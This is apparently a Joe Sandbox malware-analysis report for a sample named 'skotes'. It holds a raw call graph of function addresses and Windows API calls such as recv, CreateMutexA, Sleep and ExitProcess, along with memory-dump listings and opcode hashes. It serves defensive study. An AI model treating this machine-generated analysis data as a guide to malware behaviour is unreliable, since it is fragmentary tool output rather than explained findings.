9904->9905 9907 f6e4b0 9906->9907 9908 f6e5c9 __cftof 3 API calls 9907->9908 9909 f6e4c3 9908->9909 9914 f6e259 9909->9914 9911 f6e4cb __cftof 9913 f6e4dc __cftof __dosmaperr ___free_lconv_mon 9911->9913 9917 f6e6c4 9911->9917 9913->9898 9915 f6690a __cftof GetPEB ExitProcess GetPEB 9914->9915 9916 f6e26b 9915->9916 9916->9911 9918 f6e259 __cftof GetPEB ExitProcess GetPEB 9917->9918 9921 f6e6e4 __cftof 9918->9921 9919 f6e75a __cftof __floor_pentium4 9919->9913 9920 f6e32f __cftof GetPEB ExitProcess GetPEB 9920->9919 9921->9919 9921->9920 9923 f6690a __cftof 3 API calls 9922->9923 9924 f6b6be 9923->9924 9926 f6b6ce __floor_pentium4 9924->9926 9932 f6f1bf 9924->9932 9926->9839 9928 f6a671 __cftof 3 API calls 9927->9928 9929 f6b688 9928->9929 9930 f6b5fb __cftof 3 API calls 9929->9930 9931 f6b698 9930->9931 9931->9839 9933 f6690a __cftof 3 API calls 9932->9933 9934 f6f1df __cftof __freea __floor_pentium4 9933->9934 9934->9926 9936 f32296 9935->9936 9939 f687f8 9936->9939 9942 f67609 9939->9942 9941 f322a4 9941->9793 9943 f67649 9942->9943 9947 f67631 __cftof __dosmaperr __floor_pentium4 9942->9947 9944 f6690a __cftof 3 API calls 9943->9944 9943->9947 9945 f67661 9944->9945 9948 f67bc4 9945->9948 9947->9941 9950 f67bd5 9948->9950 9949 f67be4 __cftof __dosmaperr 9949->9947 9950->9949 9955 f68168 9950->9955 9960 f67dc2 9950->9960 9965 f67de8 9950->9965 9975 f67f36 9950->9975 9956 f68171 9955->9956 9958 f68178 9955->9958 9984 f67b50 9956->9984 9958->9950 9959 f68177 9959->9950 9961 f67dcb 9960->9961 9963 f67dd2 9960->9963 9962 f67b50 3 API calls 9961->9962 9964 f67dd1 9962->9964 9963->9950 9964->9950 9966 f67e09 __cftof __dosmaperr 9965->9966 9967 f67def 9965->9967 9966->9950 9967->9966 9968 f67f69 9967->9968 9970 f67fa2 9967->9970 9972 f67f77 9967->9972 9968->9972 9974 f67f8b 9968->9974 10002 f68241 9968->10002 9970->9974 9998 f68390 9970->9998 9972->9974 10006 f686ea 9972->10006 9974->9950 9976 f67f4f 9975->9976 9977 f67f69 9975->9977 9976->9977 9980 f67fa2 9976->9980 9982 f67f77 9976->9982 9978 f67f8b 9977->9978 9979 f68241 3 API calls 9977->9979 9977->9982 9978->9950 9979->9982 9980->9978 9981 f68390 3 API calls 9980->9981 9981->9982 9982->9978 9983 f686ea 3 API calls 9982->9983 9983->9978 9986 f67b62 __dosmaperr 9984->9986 9988 f68ab6 9986->9988 9987 f67b85 __dosmaperr 9987->9959 9989 f68ad1 9988->9989 9992 f68868 9989->9992 9991 f68adb 9991->9987 9993 f6887a 9992->9993 9994 f6690a __cftof GetPEB ExitProcess GetPEB 9993->9994 9997 f6888f __cftof __dosmaperr 9993->9997 9996 f688bf 9994->9996 9995 f66d52 GetPEB ExitProcess GetPEB 9995->9996 9996->9995 9996->9997 9997->9991 10000 f683ab 9998->10000 9999 f683dd 9999->9972 10000->9999 10010 f6c88e 10000->10010 10003 f6825a 10002->10003 10017 f6d3c8 10003->10017 10005 f6830d 10005->9972 10005->10005 10007 f68707 10006->10007 10008 f6875d __floor_pentium4 10006->10008 10007->10008 10009 f6c88e __cftof 3 API calls 10007->10009 10008->9974 10009->10007 10013 f6c733 10010->10013 10012 f6c8a6 10012->9999 10014 f6c743 10013->10014 10015 f6690a __cftof GetPEB ExitProcess GetPEB 10014->10015 10016 f6c748 __cftof __dosmaperr 10014->10016 10015->10016 10016->10012 10019 f6d3ee 10017->10019 10029 f6d3d8 __cftof __dosmaperr 10017->10029 10018 f6d485 10021 f6d4e4 10018->10021 10022 f6d4ae 10018->10022 10019->10018 10020 f6d48a 10019->10020 10019->10029 10030 f6cbdf 10020->10030 10047 f6cef8 10021->10047 10024 f6d4b3 10022->10024 10025 f6d4cc 10022->10025 10036 f6d23e 10024->10036 10043 f6d0e2 10025->10043 10029->10005 10031 f6cbf1 10030->10031 10032 f6690a __cftof GetPEB ExitProcess GetPEB 10031->10032 10033 f6cc05 10032->10033 10034 f6cef8 GetPEB ExitProcess GetPEB 10033->10034 10035 f6cc0d __alldvrm __cftof __dosmaperr _strrchr 10033->10035 10034->10035 10035->10029 10038 f6d26c 10036->10038 10037 f6d2a5 10037->10029 10038->10037 10039 f6d2de 10038->10039 10041 f6d2b7 10038->10041 10040 f6cf9a GetPEB ExitProcess GetPEB 10039->10040 10040->10037 10042 f6d16d GetPEB ExitProcess GetPEB 10041->10042 10042->10037 10044 f6d10f 10043->10044 10045 f6d14e 10044->10045 10046 f6d16d GetPEB ExitProcess GetPEB 10044->10046 10045->10029 10046->10045 10048 f6cf10 10047->10048 10049 f6cf75 10048->10049 10050 f6cf9a GetPEB ExitProcess GetPEB 10048->10050 10049->10029 10050->10049 10322 f66a44 10323 f66a52 10322->10323 10324 f66a5c 10322->10324 10327 f6698d 10324->10327 10326 f66a76 ___free_lconv_mon 10328 f6690a __cftof 3 API calls 10327->10328 10329 f6699f 10328->10329 10329->10326 10054 f4d0c7 10055 f4d0d7 10054->10055 10056 f4d17f 10055->10056 10057 f4d17b RtlWakeAllConditionVariable 10055->10057 10058 f3e0c0 recv 10059 f3e122 recv 10058->10059 10060 f3e157 recv 10059->10060 10061 f3e191 10060->10061 10062 f3e2b3 __floor_pentium4 10061->10062 10067 f4c6ac 10061->10067 10074 f4c452 10067->10074 10069 f3e2ee 10070 f4c26a 10069->10070 10071 f4c292 10070->10071 10072 f4c274 10070->10072 10071->10071 10072->10071 10091 f4c297 10072->10091 10075 f4c4a8 10074->10075 10077 f4c47a __floor_pentium4 10074->10077 10075->10077 10080 f4cf6b 10075->10080 10077->10069 10078 f4c4fd __Xtime_diff_to_millis2 10078->10077 10079 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 10078->10079 10079->10078 10081 f4cf7a 10080->10081 10083 f4cf87 __aulldvrm 10080->10083 10081->10083 10084 f4cf44 10081->10084 10083->10078 10087 f4cbea 10084->10087 10088 f4cc07 10087->10088 10089 f4cbfb GetSystemTimePreciseAsFileTime 10087->10089 10088->10083 10089->10088 10094 f32ae0 10091->10094 10093 f4c2ae std::_Throw_future_error 10101 f4bedf 10094->10101 10096 f32af4 __dosmaperr 10096->10093 10097 f6a671 __cftof 3 API calls 10096->10097 10098 f66ccc 10097->10098 10099 f68bec __cftof 3 API calls 10098->10099 10100 f66cf6 10099->10100 10104 f4cc31 10101->10104 10105 f4cc3f InitOnceExecuteOnce 10104->10105 10107 f4bef2 10104->10107 10105->10107 10107->10096 10108 f32ec0 10109 f32f06 10108->10109 10110 f32f7e GetCurrentThreadId 10108->10110 10112 f4c6ac GetSystemTimePreciseAsFileTime 10109->10112 10111 f32f94 10110->10111 10128 f32fef 10110->10128 10117 f4c6ac GetSystemTimePreciseAsFileTime 10111->10117 10111->10128 10113 f32f12 10112->10113 10114 f3301e 10113->10114 10119 f32f1d __Mtx_unlock 10113->10119 10115 f4c26a 4 API calls 10114->10115 10116 f33024 10115->10116 10120 f4c26a 4 API calls 10116->10120 10118 f32fb9 10117->10118 10122 f4c26a 4 API calls 10118->10122 10123 f32fc0 __Mtx_unlock 10118->10123 10119->10116 10121 f32f6f 10119->10121 10120->10118 10121->10110 10121->10128 10122->10123 10124 f4c26a 4 API calls 10123->10124 10125 f32fd8 __Cnd_broadcast 10123->10125 10124->10125 10126 f4c26a 4 API calls 10125->10126 10125->10128 10127 f3303c 10126->10127 10129 f4c6ac GetSystemTimePreciseAsFileTime 10127->10129 10137 f33080 shared_ptr __Mtx_unlock 10129->10137 10130 f331c5 10131 f4c26a 4 API calls 10130->10131 10132 f331cb 10131->10132 10133 f4c26a 4 API calls 10132->10133 10134 f331d1 10133->10134 10135 f4c26a 4 API calls 10134->10135 10143 f33193 __Mtx_unlock 10135->10143 10136 f331a7 __floor_pentium4 10137->10130 10137->10132 10137->10136 10139 f33132 GetCurrentThreadId 10137->10139 10138 f4c26a 4 API calls 10140 f331dd 10138->10140 10139->10136 10141 f3313b 10139->10141 10141->10136 10142 f4c6ac GetSystemTimePreciseAsFileTime 10141->10142 10144 f3315f 10142->10144 10143->10136 10143->10138 10144->10130 10144->10134 10144->10143 10146 f4bd4c 10144->10146 10149 f4bb72 10146->10149 10148 f4bd5c 10148->10144 10150 f4bb9c 10149->10150 10151 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 10150->10151 10154 f4bba4 __Xtime_diff_to_millis2 __floor_pentium4 10150->10154 10152 f4bbcf __Xtime_diff_to_millis2 10151->10152 10153 f4cf6b _xtime_get GetSystemTimePreciseAsFileTime 10152->10153 10152->10154 10153->10154 10154->10148 10342 f32e00 10343 f32e28 10342->10343 10344 f4c68b __Mtx_init_in_situ 2 API calls 10343->10344 10345 f32e33 10344->10345 10449 f38980 10451 f38aea 10449->10451 10452 f389d8 shared_ptr 10449->10452 10450 f35c10 3 API calls 10450->10452 10452->10450 10452->10451 10330 f33c47 10331 f33c51 10330->10331 10333 f332d0 5 API calls 10331->10333 10334 f33c5f 10331->10334 10332 f33c68 10333->10334 10334->10332 10335 f33810 3 API calls 10334->10335 10336 f33cdb shared_ptr 10335->10336 10487 f39f44 10488 f39f4c shared_ptr 10487->10488 10489 f3a953 Sleep CreateMutexA 10488->10489 10490 f3a01f shared_ptr 10488->10490 10491 f3a98e 10489->10491 10240 f33c8e 10241 f33c98 10240->10241 10243 f33ca5 10241->10243 10248 f32410 10241->10248 10244 f33810 3 API calls 10243->10244 10245 f33ccf 10244->10245 10246 f33810 3 API calls 10245->10246 10247 f33cdb shared_ptr 10246->10247 10249 f32424 10248->10249 10252 f4b52d 10249->10252 10260 f63aed 10252->10260 10254 f3242a 10254->10243 10255 f4b5a5 ___std_exception_copy 10267 f4b1ad 10255->10267 10257 f4b598 10263 f4af56 10257->10263 10271 f64f29 10260->10271 10262 f4b555 10262->10254 10262->10255 10262->10257 10264 f4af9f ___std_exception_copy 10263->10264 10266 f4afb2 shared_ptr 10264->10266 10277 f4b39f 10264->10277 10266->10254 10268 f4b1e1 shared_ptr 10267->10268 10269 f4b1d8 10267->10269 10268->10254 10270 f4b39f 4 API calls 10269->10270 10270->10268 10272 f64f2e __cftof 10271->10272 10272->10262 10273 f6d634 __cftof 3 API calls 10272->10273 10275 f68bfc __cftof 10272->10275 10273->10275 10274 f665ed __cftof 3 API calls 10276 f68c2f 10274->10276 10275->10274 10278 f4bedf InitOnceExecuteOnce 10277->10278 10279 f4b3e1 10278->10279 10280 f4b3e8 10279->10280 10288 f66cbb 10279->10288 10280->10266 10289 f66cc7 __dosmaperr 10288->10289 10290 f6a671 __cftof 3 API calls 10289->10290 10293 f66ccc 10290->10293 10291 f68bec __cftof 3 API calls 10292 f66cf6 10291->10292 10293->10291

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 351 f6652b-f66538 call f6a302 354 f6655a-f6656c call f6656d ExitProcess 351->354 355 f6653a-f66548 GetPEB 351->355 355->354 356 f6654a-f66559 355->356 356->354
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32(?,?,00F6652A,?,?,?,?,?,00F67661), ref: 00F66567
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: ExitProcess
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 621844428-0
                                                                                                                                                                                                                                                  • Opcode ID: 2551285c3165bd679da4ac31563c6f8914407b56742c46940d1cf4f31abe68a1
                                                                                                                                                                                                                                                  • Instruction ID: fbc0be08a5cb0316ab048559534cbad5e4509637ca5df7feb6f9e764ec2ce9fd
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2551285c3165bd679da4ac31563c6f8914407b56742c46940d1cf4f31abe68a1
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7FE0C230000208AFCF357B18DC4BE583B69EF42755F540840FD09C6222CB39ED91FA90

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001132000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303722979.0000000001135000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303745549.0000000001137000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303767974.0000000001138000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303790215.000000000113B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303815004.000000000114D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303831777.000000000114E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303854600.0000000001160000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303873017.0000000001161000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303893080.0000000001163000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303916455.0000000001174000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303943200.0000000001187000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303965962.000000000118A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303981276.000000000118B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303998935.0000000001190000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304017483.0000000001191000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304040930.0000000001194000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304064091.00000000011A4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304087036.00000000011A7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304108487.00000000011AF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304129725.00000000011B2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304151798.00000000011B3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304175036.00000000011B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304197614.00000000011B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304219810.00000000011BA000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304244496.00000000011BC000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304265215.00000000011BD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304287039.00000000011C4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304308262.00000000011C6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304330116.00000000011CD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304354120.00000000011CF000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304380462.00000000011E1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.00000000011E4000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304403341.0000000001209000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304470945.000000000123A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304494629.000000000123B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304518931.000000000123C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304543821.0000000001240000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304567673.0000000001242000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304598136.0000000001251000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2304628525.0000000001253000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_3_2_f30000_skotes.jbxd
                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                  • API ID: CreateMutexSleep
                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                  • API String ID: 1464230837-0
                                                                                                                                                                                                                                                  • Opcode ID: d6262d222555445bc03c4001ce67e73d9d92f29d16d1cd85ca1d9147953a6ce8
                                                                                                                                                                                                                                                  • Instruction ID: 9c90fc09ac75b9b056fca6424ae09d79716d4884638f4041b20c0852b7275c92
                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d6262d222555445bc03c4001ce67e73d9d92f29d16d1cd85ca1d9147953a6ce8
                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 66315B31A092008BFB08EB7CDD89B6DBB62EBC1334F244218E454E73D5C7B99A81A751

                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                  control_flow_graph 22 f39f44-f39f64 26 f39f92-f39fae 22->26 27 f39f66-f39f72 22->27 28 f39fb0-f39fbc 26->28 29 f39fdc-f39ffb 26->29 30 f39f74-f39f82 27->30 31 f39f88-f39f8f call f4d663 27->31 32 f39fd2-f39fd9 call f4d663 28->32 33 f39fbe-f39fcc 28->33 34 f3a029-f3a916 call f480c0 29->34 35 f39ffd-f3a009 29->35 30->31 36 f3a92b 30->36 31->26 32->29 33->32 33->36 42 f3a00b-f3a019 35->42 43 f3a01f-f3a026 call f4d663 35->43 38 f3a953-f3a994 Sleep CreateMutexA 36->38 39 f3a92b call f66c6a 36->39 52 f3a9a7-f3a9a8 38->52 53 f3a996-f3a998 38->53 39->38 42->36 42->43 43->34 53->52 54 f3a99a-f3a9a5 53->54 54->52
                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00000064), ref: 00F3A963
                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,00F93254), ref: 00F3A981
                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                  • Source File: 00000003.00000002.2303381446.0000000000F31000.00000040.00000001.01000000.00000007.sdmp, Offset: 00F30000, based on PE: true
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303356524.0000000000F30000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303381446.0000000000F92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303459464.0000000000F99000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303477571.0000000000F9B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303497897.0000000000FA7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303627759.0000000001108000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303648741.000000000110A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                  • Associated: 00000003.00000002.2303675886.0000000001124000.00000040.00000001.01000000.00000007.sdmpDownload File
